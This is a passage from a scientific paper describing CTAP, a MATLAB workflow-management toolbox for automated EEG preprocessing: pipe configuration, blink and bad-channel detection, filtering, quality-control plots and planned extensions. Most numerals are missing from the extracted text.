aspects of ctap are provided in the wiki pages of the github repository, which will be referenced below as ‘the wiki’. configuration in ctap a large analysis is broken down into a hierarchical set of smaller entities: steps, step sets, pipes and branches. several analysis steps form a step set and an ordered sequence of step sets is called a pipe. pipes can further be chained to form branches. the smallest unit is the analysis step which might be e.g. a filtering or a bad channel detection operation. a step is represented by a single call to a ctap_�.m-function. step sets and pipes are used to chop the analysis down into smaller chunks that are easy to move around if needed. intermediate saves are performed after each step set and therefore the organisation of steps into step sets also affects the way the pipe shows up on disk. intermediate saves provide a possibility run the whole analysis in smaller chunks and to manually check the mid-way results as often needed, e.g. while debugging. further on, the ability to create branches is important to help explore alternative ways of analysing the same data. figure relationship of the time domain data constructs dealt with in ctap. https://github.com/bwrc/ctap/wiki. cowley et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/bwrc/ctap/wiki http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ to specify the order of steps and sets within a pipe, we recommend to create a single m-file for each intended pipe. this file will define both the step sets as well as all the custom parameters to be used in the steps. default parameters are provided, but it is optimal to fine tune the behaviour by providing one’s own parameters. both pipe and parameter information is handled using data structures, rather than hard-coding. ctap then handles assignment of parameters to functions based on name matching. once the steps and their parameters are defined, the last requirement to run the pipe is to define the input data. in ctap the input data are specified using a table-like structure called measurement config that lists all available measurements, the corresponding raw eeg files, etc. this dedicated measurement config data structure allows for an easy selection of what should be analysed and it also helps to document the project. it can ctap_pipeline_looper() * executes the pipe * handles errors * loads and stores data eegout = ctapeeg_some step(eegin) * actual implementation * standalonectap_some step() * wrapper to enable pipe building ctapeeg_some step() ctap_some step() ... eegout = any_analysis_step(eegin) * actual implementation * standalone any_analysis_step() configuration * set environment: - paths - files - electrode setup * parameters for analysis steps analysis pipe * what steps are run? * how are they organized into step sets? * how does the analysis branch? * documents raw data * autogenerated or user defined * used to select what to analyze measurement config (mc) figure an overview of the core logic of ctap. ‘configuration’, ‘analysis pipe’ and ‘measurement config’ illustrate the parts that a user must specify. white boxes represent matlab functions, with the function-name on top. for an example, see the cfg_manu.m in the repository. cowley et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ be created manually or auto-generated based on a list of files or a directory. the former allows for full control and enforces project documentation whereas the latter is intended for effortless one-off analyses. both spreadsheet and sqlite formats are supported. in the last required step before pipeline execution, the configuration struct and the parameter struct are checked, finalised and integrated by cfg_ctap_functions.m. pipe execution once all prerequisites listed above have been specified, the core ctap_pipeline_looper.m function is called to run the pipe. this function takes care of loading the correct (initial or intermediate) data set, applying the specified functions from each step set, and intermediate saving of the data. the looper manages error handling such that it is robust to crashing (unless in debug mode), and will simply skip the remaining steps for a crashed file. other settings determine how to handle crashed files at later runs of the pipe (see documentation). ctap_pipeline_looper.m is designed to accept functions named ctap_�.m, as these are defined to have a fixed interface. they take two arguments: data (eeg) and configuration struct (cfg); and they return the same after any operations. some ctap_�.m perform all operations (e.g. call eeglab functions) directly, while others call a corresponding ctapeeg_�.m function that actually implements the task. hence ctap_�.m functions can be regarded as wrappers that facilitate batch-processing by providing a uniform interface. they also implement, e.g. the plotting of quality control figures. since ctap_�.m functions are quite simple, new ones can easily be added by the user to include new analysis steps, working from the provided ctap_template_function.m. users can also call the ctapeeg_�.m functions directly as part of their own custom scripts, since these are meant to be used like any eeglab analysis function. analysis results are saved separately for each pipe. a typical structure contains: � intermediate results as eeglab datasets, in one directory per step set; names are taken from the step set ids as defined by the user, prefixed by step number. � export directory contains exported feature data (txt, csv or sqlite format). � features directory: computed eeg features in matlab format. � logs directory: log files from each run. � quality_control directory: quality control plots, reflecting the visualisations of analysis steps chosen by the user. apart from running the complete pipe at once the user has many options to run just a subset of the pipe, analyse only certain measurements or otherwise adjust usage. table gives some examples. analytic methods as presented, ctap is primarily a framework for analysis management; however it contains a number of analysis functions, functions for evaluation and data-management functions including a way to generate synthetic datasets for testing (for details see function documentation). the user is easily able to add their preferred functions, but may note cowley et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the available functions as a quick way to start. all provided functions, for analysis, evaluation or data-handling, have default parameters which may serve as a starting point. almost all eeg processing methods in ctap are either novel or rewritten from original source, usually because of the unintended side-effects of the original code, such as graphical pop-ups. thus the outputs are similar to those of original eeglab or other toolbox methods, but the code base is refactored. the highlights of available ctap_�.m functions include: � functions to load data (and extract non-eeg data, e.g. ecg), events (and modify them) or channel locations (and edit them); � functions to filter, subset select (by data indices or by events), re-reference, epoch or perform ica on the data; � functions to detect artefactual data, in channels, epochs, segments or ica components, including: – variance (channels), – amplitude threshold (epochs, segments, ica components), – eeglab’s channel spectra method (channels, epochs), – metrics from the faster toolbox (channels, epochs, ica components), – metrics from the adjust toolbox (ica components), – additionally bad data can be marked by events where detection is performed by some external method; � functions to reject bad data, normalise or interpolate; � functions to extract time and frequency domain features, and create visualisations of data (as described below). table some advanced ways to use the pipe. usage options possible reasons how subset step sets investigate a bug; recompute only intermediate results set run sets to subset index, e.g. cfg.pipe.runsets = : run test step set test new feature before including in pipe add step set with id ‘test’, then set cfg.pipe.runsets = `test' ‘rewire’ the pipe test an alternative ordering of existing steps or temporarily change the input of some step set the .srcid of a given step set equal to the id of another measurement configuration filter run pipe for: subset of test subjects, or: measurements classes with separate configurations, e.g. pilots use function struct_filter.m run in debug mode develop new method in ctap set ctap_pipeline_looper parameter ‘debug’, true overwrite obsolete results update part of pipe: write new step set output over existing files set ctap_pipeline_looper parameter ‘overwrite’, true write files from failed step sets check partial outcome of step set set ctap_pipeline_looper.m parameter ‘trackfail’, true turn off intermediate saves extract numerical/visual analytics without producing updated files set stepset(x).save = false; set stepset(x+ ).srcid = stepset(x- ).id cowley et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ outputs ctap provides a number of novel outputs for evaluation and data management. visual evaluation: ctap automatically produces plots that help the user to answer questions such as: what has been done, what the data looks like and was an analysis step successful or not. the following selected visualisations are illustrated in ‘results’: � blinks: detection quality, blink erp � bad segments: snippets of raw eeg showing detections � eeg amplitudes: amplitude histograms, peeks � filtering: psd comparison � ica: ic scalp-map contact sheets, zoom-ins of bad components quantitative evaluation: every major pipe operation writes a record to the main log file. data rejections, including channels, epochs, ics or segments, are summarised here and also tabulated in a separate ‘rejections’ log. values are given for how much data was marked as bad, and what percentage of the total was bad. if more than % of data is marked bad by a single detection, a warning is given in the main log. in addition, useful statistics of each channel are logged at every call to ctap_peek_data.m, based on the output of the eeglab function signalstat.m. data-points include trimmed and untrimmed versions of mean, median, standard deviation as well as skewness, kurtosis and normality testing. the set of statistics estimated for every data channel is saved in matlab table format and also aggregated to a log file. feature export: extracted eeg features are stored internally as matlab structs that fully document all aspects of the data. these can be used to do statistical analysis inside matlab. however, often users like to do feature processing in some other environment such as r or similar. for this, ctap provides export functionality that transforms the eeg feature mat files into txt/csv text files, and/or an sqlite database. for small projects (e.g. up to subjects and channels) txt/csv export is feasible but for larger datasets sqlite is more practical. system evaluation to showcase what ctap can do we present in this paper the output of an example analysis using synthetic data. the example is part of the ctap repository; methods are chosen to illustrate the range of possibilities in ctap, rather than for the qualities of each method itself. thus, for example, we include the ctap-specific blink-correction method alongside simple amplitude thresholding, to exemplify different ways to handle artefacts. toy data ctap provides a motivating example that can also be used as a starting point for one’s own analysis pipe. the example is based on synthetically generated data with blink, myogenic (emg) and channel variance artefacts to demonstrate the usage and output of ctap. the example is part of the repository and the details of the synthetic data generation process are documented in the wiki. shortly, synthetic data is generated from https://github.com/bwrc/ctap/wiki/ syndata-generation. cowley et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/bwrc/ctap/wiki/syndata-generation https://github.com/bwrc/ctap/wiki/syndata-generation http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ seed data using generate_synthetic_data_manuscript.m, which first converts the example dataset to eeglab-format and then adds artefacts to the data. seed data included in the repository is from the bci competition iv dataset , recorded with brainamp mr plus at hz on channels. the generated min dataset is sampled at hz and has eeg channels, two mastoid channels and four eog channels. it occupies ∼ mb on disk. artefacts added to the data include blinks (generated by adding an exponential impulse of fixed duration, with amplitude that decreases linearly from front to rear of the scalp-map); and periods of emg (generated by adding a burst of noise across an arbitrary frequency band, at a high amplitude that decreases linearly away from a random centre-point). also six channels are ‘wrecked’ by randomly perturbing the variance, either very high (simulating loose electrodes) or very low (simulating ‘dead’ electrodes). analysis steps an example pipeline, described in the ctap repository in the file cfg_manu.m, is run on the synthetic data using runctap_manu.m. here, we describe the non-trivial analysis steps in order of application. for each step, we first describe the method; then the ‘results’ section shows the generated outcomes in terms of data quality control statistics and visualisations. the pipe below is shown to illustrate context of the steps, and is an abridged version of the repository code. stepset( ).id = ` _load'; stepset( ).funh = {@ctap_load_data,... @ctap_load_chanlocs,... @ctap_reref_data,... @ctap_peek_data,... @ctap_blink event}; stepset( ).id = ` _filter_ica'; stepset( ).funh = {@ctap_fir_filter,... @ctap_run_ica}; stepset( ).id = ` _artifact_correction'; stepset( ).funh = {@ctap_detect_bad_comps,... @ctap_filter_blink_ica,... @ctap_detect_bad_channels,... @ctap_reject_data,... @ctap_interp_chan, ... @ctap_detect_bad_segments,... @ctap_reject_data,... @ctap_run_ica,... @ctap_peek_data}; http://bbci.de/competition/iv/desc_ . html. cowley et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://bbci.de/competition/iv/desc_ .html http://bbci.de/competition/iv/desc_ .html http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ before-and-after ‘peeks’: the ctap_peek_data.m function is called near the start (after initial loading and re-referencing) and the end of the pipe. visual inspection of raw data is a fundamental step in eeg evaluation and quantitative inspection of channel-wise statistics is also available. a logical approach is to compare raw data at same time-points from before and after any correction operations. if ica-based corrections are made, the same approach can also be used on the raw ic data. ctap_peek_data.m expedites this work, and thus helps to regularise data inspection and facilitate comparison. ctap_peek_data.m will generate raw data plots and statistics of a set of time-points (points are generated randomly by default or can be locked to existing events). these ‘peek-points’ are embedded as events which can then generate peeks at a later stage in the pipe, allowing true before-and-after comparisons even if the data time course changes (due to removal of segments). if no peek-point data remains at the after-stage, no comparison can be made; however (especially if peek-points are randomly chosen), such an outcome is itself a strong indication that the data is very bad, or the detection methods are too strict. ctap_peek_data.m includes plotting routines for signal amplitude histograms as well as for raw eeg data. many eeg artefacts cause large changes in signal amplitudes, and consequently several basic, yet effective, eeg artefact detection methods are based on identifying samples exceeding a given amplitude threshold. on the other hand, even in controlled measurement conditions, individual baseline variation can affect the amplitude of the recorded signal. hence, accurate knowledge of the average signal amplitude is often important. blink detection: the function ctap_blink event.m is called early in the pipe to mark blinks. it creates a set of new events with latencies and durations matched to the detected blinks. the current blink detection implementation is based on a modified version of the eogert algorithm by toivanen, pettersson & lukander ( ). the algorithm finds all local peaks in the data, constructs a criterion measure and classifies peaks into blinks and non-blinks based on this measure. filtering: ctap filtering produces plots of filter output and tests of functionality as standard. ctap_fir_filter.m uses the firfilt-plug-in to do filtering, as it replaces the deprecated function pop_eegfilt.m and provides more sensible defaults. version . . of firfilt ships with eeglab. other ctap-supported filtering options are described in documentation. blink removal: blinks can either be rejected or corrected. we showcase correction using a method that combines blink-template matching and fir high-pass filtering of blink-related ics following ideas presented by lindsen & bhattacharya ( ). the method is not part of eeglab, but an add-on provided by ctap. bad ica component detection is performed by first creating ics with ctap_run_ica.m , and then using one of several options from ctap_detect_bad_comps.m to detect artefactual ics. the blink template option compares mean activity of detected blink events to activations for each ic. ctap_filter_blink_ica.m is used to filter blink-related ic data, and reconstruct the eeg using the cleaned components. the success of the blink correction is evaluated see code repository at https://github. com/bwrc/eogert. https://github.com/widmann/firfilt. including all parts described above, this particular blink-correction method is unique to ctap. default algorithm is fastica, requiring the associated toolbox on the user’s matlab path. cowley et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/bwrc/eogert https://github.com/bwrc/eogert https://github.com/widmann/firfilt http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ using blink evoked response potentials (erps) which are simply erps computed for blink events (see e.g. frank & frishkoff, for details). detect raw-data artefacts: bad channels were detected based on channel variance, with the function vari_bad_chans.m. log relative variance � was computed for all channels using the formula � ¼ logð channel variance medianðchannel varianceÞÞ. values of � more than three median absolute deviations away from median (�)were interpreted as deviant and labelled as bad. for bad segments, i.e. short segments of bad data over multiple channels, a common approach (in e.g., eeglab) is analysis of fixed length epochs, which is good for erp experiments. alternatively for working with continuous data, ctap also provides the option of amplitude histogram thresholding. many types of large artefacts can be easily found using simple histogram-based thresholding: a predefined proportion of most extreme amplitude values are marked as artefacts and segments are expanded around these. this can improve, e.g. ica analysis of low density eeg by freeing ics to capture neural source signals. for all ctap_detect_bad_�.m functions, for whichever detection method option is used (user-defined options are also straightforward to add), a field is created in the eeg struct to store the results. another field collects pointers to all results detected before a rejection. this logic allows the user to call one or many detection functions, possibly pooling the results of several approaches to bad data detection, and then pass the aggregate results to the ctap_reject_data.m function. rejection: ctap usage logic suggests that one or more detect operations for a given data type, e.g. channels, or epochs, or components, should be followed by a reject operation. it is bad practice to detect bad data across modalities, e.g. channels and epochs, before rejecting any of it, because artefacts of one type may affect the other. ctap_reject_data.m checks the detect field to determine which data type is due for rejection, unless explicitly instructed otherwise. based on the data labelled by prior calls to detection functions, ctap_reject_data.m will call an eeglab function such as pop_select.m to remove the bad data. upon rejection, visualisation tools described are used to produce plots that characterise the rejected components. note that data rejection is only necessary if there exists no method to correct the data, e.g. as is provided for the ctap blink removal method. in that case the call to the ctap_detect_bad_�.m function is not followed by a call to ctap_reject_data.m, because the method corrects the artefactual ics rather than simply deleting them. after peek: finally, the ctap_peek_data.m function is called again, providing comparator data at the same points as the initial peek call. a useful approach is to call ctap_run_ica.m again after all artefact correction steps. the resulting set of raw ic activations can be plotted by calling ctap_peek_data.m, and a careful examination should reveal the presence or absence of any remaining sufficiently large artefacts. this is a convenient way to, for example, determine whether the blink detection has identified all blink ics. results in this section, we show the output of ctap as applied to the synthetic dataset, based on the analysis-pipe steps shown above. the pipe outputs ∼ mb of eeg data after each step set, thus after debugging all steps can be expressed as one set, and data will occupy cowley et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ∼ mb (before and after processing). additionally, the quality control outputs of this pipe occupy ∼ mb of space, mostly in the many images of the peek-data and reject-data functions. before-and-after ‘peeks’ raw data: figure shows raw data before and after preprocessing. eeg amplitudes: the signal amplitude histograms of a sample of good and bad channels from the synthetic data set are shown in fig. . this can be useful for finding a suitable threshold for bad segment detection, or e.g. to detect loose electrodes. the post-processing plots show the improvement in channel normality. statistical comparison: some of the first-order statistics calculated for before-and- after comparisons are plotted in fig. , averaged over all channels. this method allows inspection of global change in the signal, which overall can be expected to become less broad (smaller range) and less variable (smaller sd) after cleaning of artefacts. a. b. figure raw eeg data centred around a synthetic blink (a) before preprocessing and (b) after preprocessing. the blinks have been largely removed and the eeg activity around blinks has remained intact. note that the y-axis scales differ slightly. cowley et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ blink detection the eogert blink detection process visualises the classification result for quality control purposes, as shown in fig. . such figures make it easy to spot possible misclassifications. in our example, all blinks inserted into the synthetic data were detected. figure eeg amplitude histograms for four channels (a) before preprocessing and (b) after preprocessing. fitted normal probability density function (pdf) is shown as red solid curve. upper and lower . % quantiles are vertical black solid lines; data inside these limits was used to estimate the trimmed standard deviation (sd) and normal pdf fitted using trimmed sd is shown as black solid curve. distribution mean is vertical dashed blue line. channel d has clearly been detected as bad, removed and interpolated. figure changes in channel statistics for range (a) and standard deviation (sd) (b). mean over channels is indicated using a dot and the range spans from th to th percentile. cowley et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ filtering figure shows one of the outputs of the fir filtering. this figure can be used to check that the filter has the desired effect on power spectrum and that its response to a unit step function is reasonable. figure scatter plot of the criterion used to detect blinks. horizontal-axis shows the criterion value while vertical-axis is random data to avoid over-plotting. the classification is done by fitting two gaussian distributions using the em algorithm and assigning labels based on likelihoods. figure a visual of filtering effects. (a) the effects of filtering on power spectrum, (b) the filter’s unit step response which can be used to assess, e.g. the filter’s effect on erp timings. cowley et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ blink removal bad ica component detection: an example of a plot for ica rejection is given in fig. , showing some basic properties of a blink-related ic. filter blink ic data: the erp-evaluated success of the blink correction is shown in fig. . the correction method clearly removes most of the blink activity. as blink related ics are corrected instead of rejected, effects on the underlying eeg are smaller. the result may have some remainder artefact (e.g. visible in fig. as small spikes after s in channels c , c ), which may motivate the complete removal of blink-related ics instead of filtering. detect and reject raw-data artefacts bad channels: in total bad channels were found which included all six ‘wrecked’ channels—this shows the algorithm is slightly greedy, which is probably preferable in the case of a high-resolution electrode set with over channels. bad channels are rejected and interpolated before proceeding (not plotted as it is a straightforward operation). bad segments: an example of bad segment detection, using simple histogram-based amplitude thresholding, is shown in fig. . in this case, the bad data is high amplitude emg but in a general setting, e.g. motion artefacts often exhibit extreme amplitudes. using these figures the user can quickly check what kind of activity exceeds the amplitude threshold in the dataset. of the emg artefacts inserted in the synthetic data, still existed at least partially, at the end of pipe. the low rejection percentage is due to the fact that emg is more of a figure independent component information plot for a blink-related ica component found using blink template matching. shown are (a) component scalp map, (b) power spectrum and (c) a stacked plot of the time series (using erpimage.m). (c) shows only first ms segments of the data. the synthetic blinks start at full seconds by design. cowley et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ change in frequency spectrum than in amplitude, yet the pipe looked for deviant amplitudes only. after peek the data comparisons after various artefact removal operations, figs. and , illustrate the success or failure of the pipe. of course there are a large number of permutations for how this can be done—it is the ctap philosophy to facilitate free choice among these options, with the least implementation overhead. additionally, the final plots of raw ic activations should show if there remains any artefacts in the data. for example, fig. shows a segment of raw data for the first / of ics for the synthetic dataset, with clear indications of issues remaining in the data. discussion we have presented ctap, an eeg preprocessing workflow-management system that provides extensive functionality for quickly building configurable, comparative, exploratory analysis pipes. already by shifting the researcher’s focus from scripting to analysis, ctap can help reduce human effort, subjectivity and consequent error. figure an example of the blink erp. (a) the blink-centred erp before correction with a clearly visible blink signal. (b) the same plot after correction. the blink is clearly removed but the underlying eeg remains largely unaffected because the correction was done in ic base. channel c shows highest blink amplitudes in the synthetic dataset. cowley et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ specifically, the system can reduce the work load of the user by streamlining analysis specification away from function coding. it can improve reliability and objectivity of the analysis by helping users treat each file in a dataset in a uniform, regular manner. ctap output can also be more easily reproduced because manual processing steps have been minimised. this enables the user to perform multiple comparative analyses for testing the robustness of the results against different preprocessing methods. philosophy, benefits and issues ctap provides many default parameters, and streamlines many features into a handful of wrapper functions. this is in order to facilitate rapid build and testing of analysis pipes. the philosophy is to prevent users becoming stuck in a single approach to the data because they have invested time in building the preprocessing code for it from scratch; or worse, because they have completed a laborious manual processing task and cannot afford to repeat it. computational testing for automated preprocessing structures pipes in function, argument specification files. this approach, instead of only making scripts that call the figure a bad data segment detected by histogram-based amplitude thresholding (ctap_detect_bad_segments.m). the -channel subset closest to the forehead is shown (c –c ). the red lines mark the area of the bad segment. cowley et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ required set of functions directly, has several benefits. function names and parameters become objects available for later processing, so one can operate on them, e.g. to record what was done to logs and to swap functions/parameters on the fly or to check the specification of the pipe. by specifying new approaches in new pipe files, and saving already-tried pipe files, one can treat the files as a record of attempted preprocesses. this record corresponds to the user’s perspective, and thus complements the additional history structure saved to the eeg file, which records all parameters for each operation not only those specified by the user. finally, the user should not usually rely on defaults (as given by ctap, eeglab or other toolboxes), because the optimal choice often depends on the data. this is also one reason to separately define pipeline and parameters. separating these as objects is convenient for e.g. testing multiple parameter configurations. a single script file per analysis approach is incompatible with parameter figure plot of raw ic activations after all processing steps. ic shows clear evidence of emg noise remaining; while ic may indicate a drifting channel. cowley et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ optimisation, because the number of different possible combinations begins to require a layer of code to manage the scripts—this is exactly what ctap provides. as different analysis strategies and methods can vary greatly, ctap was implemented as a modular system. each analysis can be constructed from discrete steps which can be implemented as stand-alone functions. as ctap is meant to be extended with custom analysis functions the interface between core ctap features and external scripts is well defined in the documentation. the only requirement is to suppress any pop-ups or gui-elements, which would prevent the automatic execution of the analysis pipe. it is also up to the user to call the functions in the right order. the system supports branching. this means that the analysis can from a tree-like structure, where some stage is used as input for multiple subsequent workflows. to allow this, any pipe can act as a starting point for another pipe. the ctap repository provides a simple example get the user going. for branches to appear, a bare minimum is a collection of three pipes of which one is run first. the other two both act on this output but in different ways. currently the user is responsible for calling the pipes of a branched setting in a meaningful order. however, this is straightforward to implement and having the analysis logic exposed in the main batch file makes it, e.g. easy to run only a subset of the branches. although ctap works as a batch-processing pipeline, it supports seamless integration of manual operations. this works such that the user can define a pipeline of operations, insert save points at appropriate steps and work manually on that data before passing it back to the pipe. the main extra benefit that ctap brings is to handle bookkeeping for all pipeline operations, such that manual operations become exceptional events that can be easily tracked, rather than one more in a large number of operations to manage. computationaltestingforautomatedpreprocessingneveroverridestheuser’sconfiguration options, even when these might break the pipe. for example, ctap_reject_data.m contains code to auto-detect the data to reject. however, the user can set this option explicitly, and can do so without having first called any corresponding detection function, which will cause preprocessing on that file to fail. allowing this failure to happen is the most straightforward approach, and ultimately more robust. combined with an informative error message the user gets immediate feedback on what is wrong with the pipe. on the other hand, ctap does provide several features to handle failure gracefully. as noted, the pipe will not crash if a single file has an unrecoverable error, although that file will not be processed further. this allows a batch to run unsupervised. then, because no existing outputs are overwritten automatically, one can easily mop-up the files that failed without redoing all those that succeeded, if the fault is identified. because pipes can be divided into step sets, tricky processes that are prone to failure can be isolated to reduce the overall time spent on crash recovery. ctap saves crashed files at the point of failure (by setting the parameter ‘trackfail’ in ctap_pipeline_looper.m), permitting closer analysis of the problematic data. in contrast to many analysis plug-ins built on top of eeglab, no gui was included in ctap. while guis have their advantages (more intuitive data exploration, easier as noted above, for this reason much original code has been refactored to avoid runtime-visible or focus-grabbing outputs. the ultimate aim is for ctap to interface directly to matlab functions to remove dependency on eeglab releases, while retaining compatibility with the eeglab data structure. cowley et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ for novice users, etc.) there is a very poor return on investment for adding one to a complex batch-processing system like ctap. a gui also sets limits to configurability and can constrain automation if ctap is executed on a hardware without graphical capabilities. the absence of gui also makes the development of extensions easier as there are fewer dependencies to handle. in contrast to many other broad-focus physiological data analysis tools, ctap is designed to meet a very focused goal with a specific approach. this does however create some drawbacks. compared to scripting one’s own pipeline from scratch, there are usage constraints imposed by the heavy use of struct-passing interfaces. some non-obvious features may take time to master, and it can be difficult (albeit unnecessary) to understand the more complex underlying processes. computational testing for automated preprocessing is also built to enable easy further development by third parties, by using standardised interfaces and structures. this was a feature of original eeglab code, but contrasts with many of the eeglab-compatible tools released since, whose functionality was often built-in an ad hoc manner. the main requirement for development is to understand the content and purpose of the eeg.ctap field (which is extensively documented in the wiki), and the general logic of ctap. developers can easily extend the toolbox by using (or emulating) the existing ctapeeg\_�.m functions, especially the ctapeeg_detect_�.m functions, which are simply interfaces to external tools for detecting artefacts. existing ctap_�.m functions can be relatively more complex to understand, but the existing template provides a guideline for development with the correct interface. future work computational testing for automated preprocessing is far from finalised, and development will continue after the initial release of the software. the main aim of future work is to evolve ctap from workflow management towards better automation, with computational comparative testing of analysis methods, to discover optimal parameters and help evaluate competing approaches. as stated above, the potential to fully automate eeg processing is constrained by the indeterminacy of eeg: known as the inverse problem, this means that it is not possible to precisely determine a ground-truth for the signal, i.e. a unique relationship to neural sources. the signal can also be highly variable between individuals, and even between intra-individual recording sessions (dandekar et al., ). these factors imply that there cannot be a general algorithmic solution to extract neurally generated electrical field information from eeg, thus always requiring some human intervention. by contrast, for example in meg certain physical properties of the system permit inference of sources even from very noisy data (taulu & hari, ) (although recording of clean data is always preferable, it is not always possible, e.g. with deep brain stimulation patients (airaksinen et al., )). while many publications have described methods for processing eeg for different purposes, such as removing artefacts, estimating signal sources, analysing erps and so on. however, despite the wealth of methodological work done, there is a lack of cowley et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ benchmarking or tools for comparison of such methods. the outcome is that the most reliable way to assess each method is to learn how it works, apply it and test the outcome on one’s own data: this is a highly time-consuming process which is hardly competitive with simply performing the bulk of preprocessing in a manual way, as seems to remain the gold standard. the effect of each method on the data is also not commonly characterised, such that methods to correct artefacts can often introduce noise to the data, especially where there was no artefact (false positives). thus, we also aim to enable testing and comparison of automated methods for preprocessing. this is still work in progress, as we are building an extension for ctap that improves testing and comparison of preprocessing methods by repeated analyses on synthetic data. this extension, tentatively titled handler for synthetic data and repeated analyses (hydra), will use synthetic data to generate ground-truth controlled tests of preprocessing methods. it will have capability to generate new synthetic data matching the parameters of the lab’s own data, and compare outcomes of methods applied to this data in a principled computational manner. this will allow experimenters to find good methods for their data, or developers to flexibly test and benchmark their novel methods. another desirable, though non-vital, future task is to expand the quality control output, to include functionality such as statistical testing of detected bad data, for the experimenter to make a more informed decision. although statistical testing is already implied in many methods of bad data detection, it is not visible to users. this will take the form of automated tools to compare output from two (or more) peeks, to help visualise changes in both baseline level and local wave forms. such aims naturally complement the work of others in the field, and it is hoped that opportunities arise to pool resources and develop better solutions by collaboration. conclusion the ultimate goal of ctap is to improve on typical ways of preprocessing high- dimensional eeg data through a structured framework for automation. we will meet this goal via the following three steps: (a) facilitate processing of large quantities of eeg data; (b) improve reliability and objectivity of such processing; (c) support development of smart algorithms to tune the thresholds of statistical selection methods (for bad channels, epochs, segments or components) to provide results which are robust enough to minimise manual intervention. we have now addressed aim (a), partly also (b) and laid the groundwork to continue developing solutions for (c). thus, the work described here provides the solid foundation needed to complete ctap, and thereby help to minimise human effort, subjectivity and error in eeg analysis; and facilitate easy, reliable batch-processing for experts and novices alike. acknowledgements the authors would like to thank andreas henelius, miika toivanen, kristian lukander and lauri ahonen for fruitful discussions on the ctap toolbox and this paper. cowley et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ additional information and declarations funding this work was partly supported by the revolution of knowledge work project no. / , funded by tekes—the finnish funding agency for technology and innovation. the funders had no role in study design, data collection and analysis, decision to publish or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: revolution of knowledge work project no. / , funded by tekes—the finnish funding agency for technology and innovation. competing interests the authors declare that they have no competing interests. author contributions � benjamin u. cowley conceived and designed the experiments, performed the experiments, analysed the data, wrote the paper, prepared figures and/or tables, performed the computation work and reviewed drafts of the paper. � jussi korpela conceived and designed the experiments, performed the experiments, analysed the data, wrote the paper, prepared figures and/or tables, performed the computation work and reviewed drafts of the paper. � jari torniainen conceived and designed the experiments, performed the experiments, analysed the data, prepared figures and/or tables, performed the computation work and reviewed drafts of the paper. data deposition the following information was supplied regarding data availability: https://github.com/bwrc/ctap. references agapov sn, bulanov va, zakharov av, sergeeva ms. . review of analytical instruments for eeg analysis. available at http://arxiv.org/abs/ . . airaksinen k, mäkelä jp, taulu s, ahonen a, nurminen j, schnitzler a, pekkonen e. . effects of dbs on auditory and somatosensory processing in parkinson’s disease. human brain mapping ( ): – doi . /hbm. . baillet s, friston k, oostenveld r. . academic software applications for electromagnetic brain mapping using meg and eeg. computational intelligence and neuroscience : – doi . / / . baillet s, tadel f, leahy rm, mosher jc, delorme a, makeig s, oostenveld r, hämäläinen m, dalal ss, zumer j, clerc m, wolters ch, kiebel s, jensen o. . academic software toolboxes for the analysis of meg data. berlin: springer, – [chapter academic s]. bao fs, liu x, zhang c. . pyeeg: an open source python module for eeg/meg feature extraction. computational intelligence and neuroscience : – doi . / / . cowley et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/bwrc/ctap http://arxiv.org/abs/ . http://dx.doi.org/ . /hbm. http://dx.doi.org/ . / / http://dx.doi.org/ . / / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ barua s, begum s. . a review on machine learning algorithms in handling eeg artifacts. in: jensfelt p, ed. the swedish ai society (sais) workshop sais, , – may , stockholm, sweden. bellec p, lavoie-courchesne s, dickinson p, lerch jp, zijdenbos ap, evans ac. . the pipeline system for octave and matlab (psom): a lightweight scripting framework and execution engine for scientific workflows. frontiers in neuroinformatics : doi . /fninf. . . bigdely-shamlo n, mullen t, kothe c, su k-m, robbins ka. . the prep pipeline: standardized preprocessing for large-scale eeg analysis. frontiers in neuroinformatics : doi . /fninf. . . chaumon m, bishop dvm, busch na. . a practical guide to the selection of independent components of the electroencephalogram for artifact correction. journal of neuroscience methods : – doi . /j.jneumeth. . . . cowley b, filetti m, lukander k, torniainen j, henelius a, ahonen l, barral o, kosunen i, valtonen t, huotilainen m, ravaja n, jaccuci g. . the psychophysiology primer: a guide to methods and a broad review with a focus on human–computer interaction. foundations and trends in hci ( – ): – doi . / . dandekar s, ales j, carney t, klein sa. . methods for quantifying intra- and inter-subject variability of evoked potential data applied to the multifocal visual evoked potential. journal of neuroscience methods ( ): – doi . /j.jneumeth. . . . delorme a, makeig s. . eeglab: 